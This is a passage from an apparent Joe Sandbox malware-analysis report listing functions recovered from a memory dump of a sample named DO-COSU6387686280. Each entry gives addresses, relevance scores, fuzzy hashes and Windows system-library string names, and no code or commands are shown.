                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$MUI
                                                                                        • API String ID: 0-17815947
                                                                                        • Opcode ID: 778545045eb8090d0cfbe9da932445794efdeb474d284a128d9ecaf7ea91dd7a
                                                                                        • Instruction ID: 6d66293c7e495cf328e8f40f368691a22f0c88d7732c10f0f6f4f27c28f730df
                                                                                        • Opcode Fuzzy Hash: 778545045eb8090d0cfbe9da932445794efdeb474d284a128d9ecaf7ea91dd7a
                                                                                        • Instruction Fuzzy Hash: F4512771E0021DAEDF11DFA9CC84AEEBBB9EB44754F140529E611F7291D7349A05CBA0
                                                                                        Function 0179A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0179A309
                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0179A2FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                        • API String ID: 0-2876891731
                                                                                        • Opcode ID: 84ea15f7dc96161ed2e1dfa7aded8d60c5d0331d5c5df3f7322cb7801b59e8ea
                                                                                        • Instruction ID: b9e813c488e399a3f9f31fe01941bdddf2bd5629a18f2bafcd73102a10cff162
                                                                                        • Opcode Fuzzy Hash: 84ea15f7dc96161ed2e1dfa7aded8d60c5d0331d5c5df3f7322cb7801b59e8ea
                                                                                        • Instruction Fuzzy Hash: A341AD31A05649DBDB11CF59D840B6AFBB4FF84704F2440A9EE00DB396E6B5D944CB51
                                                                                        Function 017CA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                        • API String ID: 2994545307-4008356553
                                                                                        • Opcode ID: a6e2c7eb6559aec7cd7fbcd0e48aeb709e555061d588c4b19f3331d9f05d6e33
                                                                                        • Instruction ID: db789ca484bee845fe88cc1eed50094a3ffa285c3f5953efc22fad6003ac4ada
                                                                                        • Opcode Fuzzy Hash: a6e2c7eb6559aec7cd7fbcd0e48aeb709e555061d588c4b19f3331d9f05d6e33
                                                                                        • Instruction Fuzzy Hash: 1501D1B2250748AFD311DF14CD49B16B7E8EB84B1AF01893DA648D7190F334D904DB46
                                                                                        Function 0179C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: MUI
                                                                                        • API String ID: 0-1339004836
                                                                                        • Opcode ID: 6d79e0e2f6d03bf58893a09a70a6a54c2362c6285c54507c682205f53a6bc30a
                                                                                        • Instruction ID: cffe779060cad33ef8b83a14bcd37dc6a8e5eab38ca9c53cd1df0fd3ca884190
                                                                                        • Opcode Fuzzy Hash: 6d79e0e2f6d03bf58893a09a70a6a54c2362c6285c54507c682205f53a6bc30a
                                                                                        • Instruction Fuzzy Hash: B2825A75E002198BEF25CFADE884BEDFBB5BF48310F1481A9D919AB351D7309989CB50
                                                                                        Function 0183A118 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: dd2daf091a0908c41d4a071ef04b3cd8a8f8932307c5279fece8a3209b292a7f
                                                                                        • Instruction ID: 1d4ba188e428942faa4dc0d004d249c014300e567f4039eaf916fa95556fd8db
                                                                                        • Opcode Fuzzy Hash: dd2daf091a0908c41d4a071ef04b3cd8a8f8932307c5279fece8a3209b292a7f
                                                                                        • Instruction Fuzzy Hash: 7F22DE742046658BEB29CF2DC094376BBF1AF85304F0C845AE9C6CF286E775D642DBA0
                                                                                        Function 01796A50 Relevance: 2.0, APIs: 1, Instructions: 548COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: da679a6cd3d37688eddb9da8534bf8a2d90bd93d6d26b945cf4b014d43441d89
                                                                                        • Instruction ID: 1d0c2470e72c6f40f56efc047ec952b317c3a901d92a755a589dd1a22e9e9a05
                                                                                        • Opcode Fuzzy Hash: da679a6cd3d37688eddb9da8534bf8a2d90bd93d6d26b945cf4b014d43441d89
                                                                                        • Instruction Fuzzy Hash: E9328C75A04205CFDF25CFA8D480AAAFBF1FF48310F6486A9EA55AB351D734E845CB50
                                                                                        Function 017965D0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8bafa393d17eca918fd59bd5d0ce823bb0c60a1125d8849548239f85701c8409
                                                                                        • Instruction ID: fb90f63206302b14db86afc4b0c3a8eb6440508f61d1d9b77394b33edbdc41cc
                                                                                        • Opcode Fuzzy Hash: 8bafa393d17eca918fd59bd5d0ce823bb0c60a1125d8849548239f85701c8409
                                                                                        • Instruction Fuzzy Hash: 97E17C71608342CFCB15CF28D494A6AFBE0BF89314F158A6DF99987351E731E909CB92
                                                                                        Function 017BE5E7 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 75f7dacea9a4fc0b36efc2f6911e42be4d61aa103509a0e8dbeea927f9e6599b
                                                                                        • Instruction ID: 32d382441c2afba270526815006feda060f0dd3305c0702d469596ad69e133b0
                                                                                        • Opcode Fuzzy Hash: 75f7dacea9a4fc0b36efc2f6911e42be4d61aa103509a0e8dbeea927f9e6599b
                                                                                        • Instruction Fuzzy Hash: B5A1E532E006199FEB219B6CC888BEEFBB4AB01714F050169EB11AB391DB749D41CBD1
                                                                                        Function 017BEBFC Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8ddee8c140b18a1a615377a9f1322045cf20e9c62a768c534282eab75e72e38b
                                                                                        • Instruction ID: 227bbb09ff471b9bb62821605d46cc2b5ff2433ab78ad38800df3a95b1666c61
                                                                                        • Opcode Fuzzy Hash: 8ddee8c140b18a1a615377a9f1322045cf20e9c62a768c534282eab75e72e38b
                                                                                        • Instruction Fuzzy Hash: 7441BF722043018FD720DF28C884AABF7E9FF88214F10496EE657C3756EB74E8848B51
                                                                                        Function 0179262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: 11632b7754230be7470046d1ef935069eef1d61388c4c4f347c9b5724ce95aa2
                                                                                        • Instruction ID: c221c7c942db95d56892fe771ccbd5e13c9c89f76e09560947074dc809eb70ef
                                                                                        • Opcode Fuzzy Hash: 11632b7754230be7470046d1ef935069eef1d61388c4c4f347c9b5724ce95aa2
                                                                                        • Instruction Fuzzy Hash: 4241C370501705EFCB21FF28E944A59F7F5FF49310F148299C6069BAA6EB30A945CF81
                                                                                        Function 018107C3 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: 6ebdc461fbdc88cb867c67e31a3d6b247a4259f1a211adf5088f2a25852d9c51
                                                                                        • Instruction ID: f5fae5dc70684ebfc2b0d02c4492871328a5c2c17f51b86323e284e5ce2b979f
                                                                                        • Opcode Fuzzy Hash: 6ebdc461fbdc88cb867c67e31a3d6b247a4259f1a211adf5088f2a25852d9c51
                                                                                        • Instruction Fuzzy Hash: 42417BB25083059BD720DF29C845B9BFBE8FF88754F004A2EF998D7255E7709A44CB92
                                                                                        Function 01794859 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: 267a7a340d37c45256e5881b31d712bcd06f6a18f31cc34d99a31da8506d15be
                                                                                        • Instruction ID: a879571661547194726bea4c7a29928859c093e87b4cd51fcfab52335a93752c
                                                                                        • Opcode Fuzzy Hash: 267a7a340d37c45256e5881b31d712bcd06f6a18f31cc34d99a31da8506d15be
                                                                                        • Instruction Fuzzy Hash: 0C41C6306043019FDB25DF1CE984B2AFBEAFF80364F14456DEA568B291D730D94ACB51
                                                                                        Function 0183EBD0 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: 18dbfd9aded59dc15881e96eb03374942f3d3f2f21c99bdd3e2682941358dec4
                                                                                        • Instruction ID: 0815723d51ecac296c8a06af2d999860dd84b87b985b7bcd194f8c3516bcd777
                                                                                        • Opcode Fuzzy Hash: 18dbfd9aded59dc15881e96eb03374942f3d3f2f21c99bdd3e2682941358dec4
                                                                                        • Instruction Fuzzy Hash: B73167715153018FC711EF19C58095ABBF1FBC9714F484AAEE488AB356E331DA46CB92
                                                                                        Function 01864B00 Relevance: 1.6, APIs: 1, Instructions: 57timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: 2a1c01e8ab8eedfa9663726a23762690fa3eb9b805c6a8a1678b91b093961bf4
                                                                                        • Instruction ID: e58051c135f49d6cbc0c227d73e13446d20ce1ccf0af5152e3bcfa992d1d2ddb
                                                                                        • Opcode Fuzzy Hash: 2a1c01e8ab8eedfa9663726a23762690fa3eb9b805c6a8a1678b91b093961bf4
                                                                                        • Instruction Fuzzy Hash: D411E9362006119FD721DAADD844F6FF7A9FFC4710F154529E642C7654DB30EA02CB90
                                                                                        Function 0181A4B0 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: dbd668b1534f52bfd6a604ece3572adaa25e3caebab44a33ec31bd52440b725f
                                                                                        • Instruction ID: ee042a61eab4e241fe0c907e643e3d23abb125331285aa79f9cb16e7f5537b29
                                                                                        • Opcode Fuzzy Hash: dbd668b1534f52bfd6a604ece3572adaa25e3caebab44a33ec31bd52440b725f
                                                                                        • Instruction Fuzzy Hash: 00018936105149EBCF129E88D840EDE7F6AFB4C754F058102FE19A6224C336DA70EF81
                                                                                        Function 01816420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        • Opcode ID: c53e960c48be9292e6664a35305ee2cf05aea51dbeaa80b471181cc61cb280c5
                                                                                        • Instruction ID: 8c7b343a678121bbdeadf6caf9144c03065a1c1cdd63194e9632cdf5d20365e9
                                                                                        • Opcode Fuzzy Hash: c53e960c48be9292e6664a35305ee2cf05aea51dbeaa80b471181cc61cb280c5
                                                                                        • Instruction Fuzzy Hash: 5E915172941219AFEB21DB99CD85FEEBBB8EF54750F200455F600EB199E774AA00CB60
                                                                                        Function 0183E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        • Opcode ID: 78d18a3cf6a12da242adc65a54ece6d847537cab0b492ec0140d5c6a3f045df7
                                                                                        • Instruction ID: 2bf0f45f3105299221c8653d3b85495fe73ba689fe07a5a1c7fa3dcf7b24f06f
                                                                                        • Opcode Fuzzy Hash: 78d18a3cf6a12da242adc65a54ece6d847537cab0b492ec0140d5c6a3f045df7
                                                                                        • Instruction Fuzzy Hash: DA918D31901609BFDB22AFA5DC88FAFBB79EF85744F180029F505E7251EB749A01CB91
                                                                                        Function 017CA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: GlobalTags
                                                                                        • API String ID: 0-1106856819
                                                                                        • Opcode ID: 2a46058e0e0676df98826bcc318d2b9338b6ea14fc4c9a8eea24fda9a50a8025
                                                                                        • Instruction ID: 65d6f1f95800b5bf34deccbfe5afdfef89539f7c4c71030e67f9b387649c744d
                                                                                        • Opcode Fuzzy Hash: 2a46058e0e0676df98826bcc318d2b9338b6ea14fc4c9a8eea24fda9a50a8025
                                                                                        • Instruction Fuzzy Hash: 96715CB5E0021E8BDF69CF9CC9906ADBBB1BF48710F24812EE505E7285F7319A51CB60
                                                                                        Function 01834978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .mui
                                                                                        • API String ID: 0-1199573805
                                                                                        • Opcode ID: 745f27a91005e194f34c851b6409895c4685838125971c5315695b0638eaa57f
                                                                                        • Instruction ID: 3d2a491c0810c093b08fc358e23ed3ed8301f6750efe60b008e9683c91fe3c82
                                                                                        • Opcode Fuzzy Hash: 745f27a91005e194f34c851b6409895c4685838125971c5315695b0638eaa57f
                                                                                        • Instruction Fuzzy Hash: D251B572D0022A9BDF14DF99D844AAEFBB5AF44B54F094129E911FB250D3749E01CBE4
                                                                                        Function 017AE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: EXT-
                                                                                        • API String ID: 0-1948896318
                                                                                        • Opcode ID: 714b94090ba1534a0fac4650df9588d38da9001623a41fb8d7b8f90eb5624e8e
                                                                                        • Instruction ID: a82e2feac899d2f5eb9a399120032cdc9330dda3464cb8c0d6b8a2324e94d323
                                                                                        • Opcode Fuzzy Hash: 714b94090ba1534a0fac4650df9588d38da9001623a41fb8d7b8f90eb5624e8e
                                                                                        • Instruction Fuzzy Hash: BF418072508302ABD710DA75C984B6BFBE8AFC8714F840A2DFA84D7180EB74D944C792
                                                                                        Function 0180C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: BinaryHash
                                                                                        • API String ID: 0-2202222882
                                                                                        • Opcode ID: 6d42243c7ef8ce431e805614f002a88522f618e4f2ce72c74cc45698b90eec44
                                                                                        • Instruction ID: 138d49768027acdc468ab5486230832e62394595c2dd3a00607d54802bcfc913
                                                                                        • Opcode Fuzzy Hash: 6d42243c7ef8ce431e805614f002a88522f618e4f2ce72c74cc45698b90eec44
                                                                                        • Instruction Fuzzy Hash: 4C4163B1D0012DABDB61DE54CC84FDEB77CAB45714F0046E5AB08AB181DB709F898FA9
                                                                                        Function 01826B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
